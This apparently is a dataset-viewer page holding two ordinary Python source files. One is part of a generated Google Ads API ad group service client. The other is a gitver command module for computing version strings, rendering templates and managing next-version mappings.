    request: Union[ad_group_service.GetAdGroupRequest, dict] = None,
    *,
    resource_name: str = None,
    retry: OptionalRetry = gapic_v1.method.DEFAULT,
    timeout: float = None,
    metadata: Sequence[Tuple[str, str]] = (),
) -> ad_group.AdGroup:
    r"""Fetch a single ad group in full detail.

    List of thrown errors: `AuthenticationError <>`__
    `AuthorizationError <>`__ `HeaderError <>`__
    `InternalError <>`__ `QuotaError <>`__ `RequestError <>`__

    Args:
        request (Union[google.ads.googleads.v9.services.types.GetAdGroupRequest, dict]):
            The request object for
            [AdGroupService.GetAdGroup][google.ads.googleads.v9.services.AdGroupService.GetAdGroup].
        resource_name (:class:`str`):
            Required. The resource name of the ad group to fetch.
            Populates the ``resource_name`` field of ``request``; must not
            be given when a ``request`` object is supplied.
        retry (google.api_core.retry.Retry): Designation of what errors,
            if any, should be retried.
        timeout (float): The timeout for this request.
        metadata (Sequence[Tuple[str, str]]): Strings which should be
            sent along with the request as metadata.

    Returns:
        google.ads.googleads.v9.resources.types.AdGroup:
            An ad group.

    Raises:
        ValueError: If both ``request`` and a flattened field are set.
    """
    # A full request object and flattened field arguments are mutually
    # exclusive.
    has_flattened_params = any([resource_name])
    if request is not None and has_flattened_params:
        raise ValueError(
            "If the `request` argument is set, then none of "
            "the individual field arguments should be set."
        )

    # Coerce dicts (or None) into the proto-plus request type; an instance
    # of the right type passes through untouched, avoiding a copy.
    if not isinstance(request, ad_group_service.GetAdGroupRequest):
        request = ad_group_service.GetAdGroupRequest(request)

    # Apply the flattened keyword argument, if given.
    if resource_name is not None:
        request.resource_name = resource_name

    # The transport layer supplies the retry/timeout-wrapped callable.
    rpc = self._transport._wrapped_methods[self._transport.get_ad_group]

    # Route the call by resource name via the gRPC metadata header.
    routing_header = gapic_v1.routing_header.to_grpc_metadata(
        (("resource_name", request.resource_name),)
    )
    metadata = tuple(metadata) + (routing_header,)

    # Send the request and hand the response straight back.
    return rpc(request, retry=retry, timeout=timeout, metadata=metadata)
def mutate_ad_groups(
    self,
    request: Union[ad_group_service.MutateAdGroupsRequest, dict] = None,
    *,
    customer_id: str = None,
    operations: Sequence[ad_group_service.AdGroupOperation] = None,
    retry: OptionalRetry = gapic_v1.method.DEFAULT,
    timeout: float = None,
    metadata: Sequence[Tuple[str, str]] = (),
) -> ad_group_service.MutateAdGroupsResponse:
    r"""Create, update, or remove ad groups, returning operation statuses.

    List of thrown errors: `AdGroupError <>`__ `AdxError <>`__
    `AuthenticationError <>`__ `AuthorizationError <>`__
    `BiddingError <>`__ `BiddingStrategyError <>`__
    `DatabaseError <>`__ `DateError <>`__ `DistinctError <>`__
    `FieldError <>`__ `FieldMaskError <>`__ `HeaderError <>`__
    `IdError <>`__ `InternalError <>`__ `ListOperationError <>`__
    `MultiplierError <>`__ `MutateError <>`__
    `NewResourceCreationError <>`__ `NotEmptyError <>`__
    `NullError <>`__ `OperationAccessDeniedError <>`__
    `OperatorError <>`__ `QuotaError <>`__ `RangeError <>`__
    `RequestError <>`__ `ResourceCountLimitExceededError <>`__
    `SettingError <>`__ `SizeLimitError <>`__
    `StringFormatError <>`__ `StringLengthError <>`__
    `UrlFieldError <>`__

    Args:
        request (Union[google.ads.googleads.v9.services.types.MutateAdGroupsRequest, dict]):
            The request object for
            [AdGroupService.MutateAdGroups][google.ads.googleads.v9.services.AdGroupService.MutateAdGroups].
        customer_id (:class:`str`):
            Required. The ID of the customer whose ad groups are being
            modified. Populates the ``customer_id`` field of ``request``;
            must not be given when a ``request`` object is supplied.
        operations (:class:`Sequence[google.ads.googleads.v9.services.types.AdGroupOperation]`):
            Required. The list of operations to perform on individual ad
            groups. Populates the ``operations`` field of ``request``;
            must not be given when a ``request`` object is supplied.
        retry (google.api_core.retry.Retry): Designation of what errors,
            if any, should be retried.
        timeout (float): The timeout for this request.
        metadata (Sequence[Tuple[str, str]]): Strings which should be
            sent along with the request as metadata.

    Returns:
        google.ads.googleads.v9.services.types.MutateAdGroupsResponse:
            Response message for an ad group mutate.

    Raises:
        ValueError: If both ``request`` and a flattened field are set.
    """
    # A full request object and flattened field arguments are mutually
    # exclusive.
    has_flattened_params = any([customer_id, operations])
    if request is not None and has_flattened_params:
        raise ValueError(
            "If the `request` argument is set, then none of "
            "the individual field arguments should be set."
        )

    # Coerce dicts (or None) into the proto-plus request type; an instance
    # of the right type passes through untouched, avoiding a copy.
    if not isinstance(request, ad_group_service.MutateAdGroupsRequest):
        request = ad_group_service.MutateAdGroupsRequest(request)

    # Apply the flattened keyword arguments, if given.
    if customer_id is not None:
        request.customer_id = customer_id
    if operations is not None:
        request.operations = operations

    # The transport layer supplies the retry/timeout-wrapped callable.
    rpc = self._transport._wrapped_methods[self._transport.mutate_ad_groups]

    # Route the call by customer id via the gRPC metadata header.
    routing_header = gapic_v1.routing_header.to_grpc_metadata(
        (("customer_id", request.customer_id),)
    )
    metadata = tuple(metadata) + (routing_header,)

    # Send the request and hand the response straight back.
    return rpc(request, retry=retry, timeout=timeout, metadata=metadata)
# Public API surface of this module.
__all__ = ("AdGroupServiceClient",)
| |
#!/usr/bin/env python2
# coding=utf-8
"""
Defines gitver commands
"""
import re
import os
import sys
from string import Template
from termcolors import term, bold
from git import get_repo_info
from gitver.storage import KVStore
from sanity import check_gitignore
from defines import CFGDIR, PRJ_ROOT, CFGDIRNAME
from version import gitver_version, gitver_buildid
# file where to store NEXT strings <=> TAG user-defined mappings
NEXT_STORE_FILE = os.path.join(CFGDIR, ".next_store")
# directory holding user-provided template files
TPLDIR = os.path.join(CFGDIR, 'templates')
# matches "maj.min.patch[.revision]" with an optional leading "v";
# each component is captured in its own named group
user_version_matcher = r"v{0,1}(?P<maj>\d+)\.(?P<min>\d+)\.(?P<patch>\d+)" \
                       r"(?:\.(?P<revision>\d+))?$"
#
# helpers
#
def template_path(name):
    """
    Return the absolute path of the template file with the given name,
    rooted at the gitver template directory.
    """
    return os.path.join(TPLDIR, name)
def parse_templates(cfg, templates, repo, next_custom, preview):
    """
    Parse one or more templates, substitute placeholder variables with
    real values and write the result to the file specified in the template.
    If preview is True, then the output will be written to the stdout while
    informative messages will be output to the stderr.
    """
    # `templates` is a space-separated list of template names
    for t in templates.split(' '):
        tpath = template_path(t)
        if os.path.exists(tpath):
            with open(tpath, 'r') as fp:
                lines = fp.readlines()
            # a valid template needs at least the output header plus one
            # content line
            if len(lines) < 2:
                term.err("The template \"" + t + "\" is not valid, aborting.")
                return
            # first line must be a '#'-prefixed header naming the output file
            if not lines[0].startswith('#'):
                term.err("The template \"" + t + "\" doesn't define any valid "
                         "output, aborting.")
                return
            output = str(lines[0]).strip(' #\n')
            # resolve relative paths to the project's root
            if not os.path.isabs(output):
                output = os.path.join(PRJ_ROOT, output)
            outdir = os.path.dirname(output)
            # NOTE(review): this only reports the missing directory and then
            # keeps going; the later open() would fail — confirm whether an
            # early return/exit was intended here.
            if not os.path.exists(outdir):
                term.err("The template output directory \"" + outdir +
                         "\" doesn't exists.")
            term.info("Processing template \"" + bold(t) + "\" for " + output +
                      "...")
            # drop the header line, keep only the template body
            lines = lines[1:]
            xformed = Template("".join(lines))
            vstring = build_version_string(cfg, repo, False, next_custom)
            args = build_format_args(cfg, repo, next_custom)
            # placeholder names exposed to the template body
            keywords = {
                'CURRENT_VERSION': vstring,
                'MAJOR': args['maj'],
                'MINOR': args['min'],
                'PATCH': args['patch'],
                'REV': args['rev'],
                'REV_PREFIX': args['rev_prefix'],
                'BUILD_ID': args['build_id'],
                'FULL_BUILD_ID': args['build_id_full'],
                'COMMIT_COUNT': args['commit_count'],
                # NOTE(review): commit_count may be '' (see build_format_args);
                # '' > 0 only works under Python 2's mixed-type comparison
                'COMMIT_COUNT_STR':
                    str(args['commit_count']) if args['commit_count'] > 0 else '',
                'COMMIT_COUNT_PREFIX': args['commit_count_prefix'],
                'META_PR': args['meta_pr'],
                'META_PR_PREFIX': args['meta_pr_prefix']
            }
            try:
                res = xformed.substitute(keywords)
            except KeyError as e:
                # e.message is Python-2-only
                term.err("Unknown key \"" + e.message + "\" found, aborting.")
                sys.exit(1)
            if not preview:
                try:
                    fp = open(output, 'w')
                    fp.write(res)
                    fp.close()
                except IOError:
                    term.err("Couldn't write file \"" + output + "\"")
                    sys.exit(1)
            else:
                term.out(res)
            # in preview mode nothing was written, so report the would-be size
            wrote_bytes = len(res) if preview else os.stat(output).st_size
            term.info("Done, " + str(wrote_bytes) + " bytes written.")
        else:
            term.err("Couldn't find the \"" + t + "\" template")
            sys.exit(1)
def parse_user_next_stable(user):
    """
    Parse the specified user-defined string containing the next stable version
    numbers and return the discretized matches in a dictionary.

    Returns False when the string doesn't match the expected
    "maj.min.patch[.revision]" format (with an optional leading "v").
    """
    # Test the match explicitly instead of letting None.groupdict() raise
    # AttributeError; the old `len(data) < 3` guard was dead code because
    # groupdict() always returns all four named groups.
    match = re.match(user_version_matcher, user)
    if match is None:
        return False
    return match.groupdict()
def build_format_args(cfg, repo_info, next_custom=None):
    """
    Build and return the dictionary of formatting arguments derived from the
    specified repository information.

    Pre-release metadata carried by a tag always takes precedence over any
    existing user-defined NEXT string.
    """
    commit_count = repo_info['count']
    in_next = commit_count > 0
    has_next_custom = next_custom is not None and len(next_custom) > 0

    major = repo_info['maj']
    minor = repo_info['min']
    patch = repo_info['patch']
    revision = repo_info['rev']
    pre_release = repo_info['pr']
    build_id = repo_info['build-id']
    has_pr = pre_release is not None
    has_rev = revision is not None

    # pre-release metadata in a tag has precedence over user-specified
    # NEXT strings
    if in_next and has_next_custom and not has_pr:
        parsed = parse_user_next_stable(next_custom)
        if not parsed:
            term.err("Invalid custom NEXT version numbers detected!")
            sys.exit(1)
        major = parsed['maj']
        minor = parsed['min']
        patch = parsed['patch']
        revision = parsed['revision']
        has_rev = revision is not None

    # choose the pre-release metadata string: tag metadata first, then the
    # configured defaults depending on whether a NEXT string exists
    if has_pr:
        meta_pr = pre_release
    elif in_next and has_next_custom:
        meta_pr = cfg['default_meta_pr_in_next']
    elif in_next:
        meta_pr = cfg['default_meta_pr_in_next_no_next']
    else:
        meta_pr = ''

    return {
        'maj': major,
        'min': minor,
        'patch': patch,
        'rev': revision if has_rev else '',
        'rev_prefix': '.' if has_rev else '',
        'meta_pr': meta_pr,
        'meta_pr_prefix': cfg['meta_pr_prefix'] if len(meta_pr) > 0 else '',
        'commit_count': commit_count if commit_count > 0 else '',
        'commit_count_prefix':
            cfg['commit_count_prefix'] if commit_count > 0 else '',
        'build_id': build_id,
        'build_id_full': repo_info['full-build-id']
    }
def build_version_string(cfg, repo, promote=False, next_custom=None):
    """
    Build and return the final version string for the specified repository
    information, optionally handling version promotion.

    When promoting, the user-specified next version string is returned as-is
    if one is present, otherwise an empty string is returned.
    """
    in_next = repo['count'] > 0
    has_next_custom = next_custom is not None and len(next_custom) > 0

    if promote:
        # simulates next real version after proper tagging
        return next_custom if has_next_custom else ''

    fmt = cfg['format_next'] if in_next else cfg['format']
    return fmt % build_format_args(cfg, repo, next_custom)
#
# commands
#
def cmd_version(cfg, args):
    """
    Print gitver's own version string, full build ID and license information
    to the stdout.
    """
    version_str = ('v' + gitver_version) if gitver_version is not None else 'n/a'
    build_str = gitver_buildid if gitver_buildid is not None else 'n/a'
    term.out("This is gitver " + bold(version_str))
    term.out("Full build ID is " + bold(build_str))
    # imported here, after the banner lines, exactly as in the original flow
    from gitver import __license__
    term.out(__license__)
def cmd_init(cfg, args):
    """
    Initializes the current repository by creating the gitver's configuration
    directory and creating the default configuration file, if none is present.

    Multiple executions of this command will regenerate the default
    configuration file whenever it's not found.
    """
    from config import create_default_configuration_file

    # Ensure both the configuration and the template directories exist.
    # (The original kept an `i` counter of created directories that was
    # never read — removed as dead code.)
    if not os.path.exists(CFGDIR):
        os.makedirs(CFGDIR)

    if not os.path.exists(TPLDIR):
        os.makedirs(TPLDIR)

    # try create the default configuration file
    wrote_cfg = create_default_configuration_file()

    if wrote_cfg:
        term.out("gitver has been initialized and configured.")
    else:
        term.warn("gitver couldn't create the default configuration file, "
                  "does it already exist?")
def cmd_current(cfg, args):
    """
    Print the current version string, computed from the state of the
    repository, to the stdout.
    """
    store = KVStore(NEXT_STORE_FILE)
    info = get_repo_info()
    tag = info['last-tag']
    # pick up the user-defined NEXT mapping for the last tag, if any
    custom = store.get(tag) if store.has(tag) else None
    term.out(build_version_string(cfg, info, False, custom))
def cmd_info(cfg, args):
    """
    Generates version string and repository information and prints it to the
    stdout.
    """
    next_store = KVStore(NEXT_STORE_FILE)
    repo_info = get_repo_info()
    last_tag = repo_info['last-tag']
    has_next_custom = next_store.has(last_tag)
    next_custom = next_store.get(last_tag) if has_next_custom else None
    # describe where the NEXT string comes from: an explicit user mapping or
    # the configured default suffix
    if has_next_custom:
        nvn = term.next(next_custom)
    else:
        nvn = "none, defaulting to " + \
              term.next("-" + cfg['default_meta_pr_in_next_no_next']) + \
              " suffix"
    term.out("Most recent tag: " + term.tag(last_tag))
    # NOTE(review): when 'pr' is None and 'count' == 0, neither branch below
    # prints the NEXT information — confirm this omission is intended.
    if repo_info['pr'] is None and repo_info['count'] > 0:
        term.out("Using NEXT defined as: " + nvn)
        term.out("(Pre-release metadata: none)")
    elif repo_info['pr'] is not None:
        term.out("(NEXT defined as: " + nvn + ")")
        term.out("Using pre-release metadata: " +
                 term.tag(str(repo_info['pr'])))
    term.out("Current build ID: " + term.tag(repo_info['full-build-id']))
    # promoted is the version the repo WOULD have after proper tagging;
    # empty when no user-defined NEXT string exists
    promoted = build_version_string(cfg, repo_info, True, next_custom)
    term.out(
        "Current version: " + "v" +
        term.ver(build_version_string(
            cfg, repo_info, False, next_custom)) +
        (" => v" + term.prom(promoted) if len(promoted) > 0 else '')
    )
def cmd_list_templates(cfg, args):
    """
    Print the list of templates found in gitver's template directory to the
    stdout.
    """
    available = [entry for entry in os.listdir(TPLDIR)
                 if os.path.isfile(template_path(entry))]
    if not available:
        term.out("No templates available in " + TPLDIR)
        return
    term.out("Available templates:")
    for name in available:
        term.out(" " + bold(name) + " (" + template_path(name) + ")")
def __cmd_build_template(cfg, args, preview=False):
    """
    Shared implementation behind cmd_build_template and cmd_preview_template;
    kept internal to avoid code duplication between the two commands.
    """
    store = KVStore(NEXT_STORE_FILE)
    info = get_repo_info()
    tag = info['last-tag']
    # pick up the user-defined NEXT mapping for the last tag, if any
    custom = store.get(tag) if store.has(tag) else None
    parse_templates(cfg, args.templates, info, custom, preview)
def cmd_build_template(cfg, args):
    """
    Substitute placeholder variables in the templates named by @param args
    and write each result to the output file declared by the template itself.
    """
    __cmd_build_template(cfg, args, preview=False)
def cmd_preview_template(cfg, args):
    """
    Substitute placeholder variables in the templates named by @param args
    and print the result to the stdout instead of writing files.
    """
    __cmd_build_template(cfg, args, preview=True)
def cmd_next(cfg, args):
    """
    Define the next stable version string for the most recent and reachable
    tag.

    The expected input format is "maj.min.patch[.revision]", where the
    bracketed part is optional; all values must be decimal numbers without
    leading zeros.
    """
    store = KVStore(NEXT_STORE_FILE)
    info = get_repo_info()
    tag = info['last-tag']

    parsed = parse_user_next_stable(args.next_version_numbers)
    if not parsed:
        term.err("Please specify valid version numbers.\nThe expected "
                 "format is <MAJ>.<MIN>.<PATCH>[.<REVISION>], e.g. v0.0.1, "
                 "0.0.1 or 0.0.2.1")
        sys.exit(1)

    # normalize the numbers (drops any leading "v" and zero-padding)
    custom = "%d.%d.%d" % (
        int(parsed['maj']), int(parsed['min']), int(parsed['patch']))
    if parsed['revision'] is not None:
        custom += ".%d" % (int(parsed['revision']))

    store.set(tag, custom).save()
    term.out("Set NEXT version string to " + term.next(custom) +
             " for the current tag " + term.tag(tag))
def cmd_clean(cfg, args):
    """
    Remove the user-defined next stable version for the tag given in
    @param args, or for the most recent and reachable tag if none was given.
    """
    store = KVStore(NEXT_STORE_FILE)
    if len(args.tag) > 0:
        tag = args.tag
    else:
        tag = get_repo_info()['last-tag']

    if store.has(tag):
        # remember the value before removing it, for the report below
        previous = store.get(tag)
        store.rm(tag).save()
        term.out("Cleaned up custom string version \"" + previous +
                 "\" for tag \"" + tag + "\"")
    else:
        term.out("No custom string version found for tag \"" + tag + "\"")
def cmd_cleanall(cfg, args):
    """
    Remove ALL user-defined next stable versions at once by deleting the
    backing store file.
    """
    if not os.path.exists(NEXT_STORE_FILE):
        term.out("No NEXT custom strings found.")
        return
    os.unlink(NEXT_STORE_FILE)
    term.out("All previously set custom strings have been removed.")
def cmd_list_next(cfg, args):
    """
    Print every user-defined next stable version to the stdout, marking the
    entry attached to the most recent and reachable tag.
    """
    store = KVStore(NEXT_STORE_FILE)
    info = get_repo_info()
    last_tag = info['last-tag']

    if store.empty():
        term.out("No NEXT custom strings set.")
        return

    def print_item(k, v):
        # '(*)' flags the most recent and reachable tag
        suffix = ' (*)' if k == last_tag else ''
        term.out(" %s => %s" % (term.tag(k), term.next(v)) + suffix)

    term.out("Currently set NEXT custom strings (*=most recent and "
             "reachable tag):")
    for tag, vstring in sorted(store.items()):
        print_item(tag, vstring)
    if not store.has(last_tag):
        print_item(last_tag, '<undefined>')
def cmd_check_gitignore(cfg, args):
    """
    Ensure that at least one line in the .gitignore file for the current
    repository mentions the '.gitver' directory in some way.

    Even a rule such as "!.gitver" passes the check: the assumption is that
    some reasoning has been done before declaring something like that.
    """
    if check_gitignore():
        term.out("Your .gitignore file looks fine.")
        return
    term.out("Your .gitignore file doesn't define any rule for the " +
             CFGDIRNAME + "\nconfiguration directory: it's recommended to "
             "exclude it from\nthe repository, unless you know what you "
             "are doing. If you are not\nsure, add this line to your "
             ".gitignore file:\n\n " + CFGDIRNAME + "\n")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.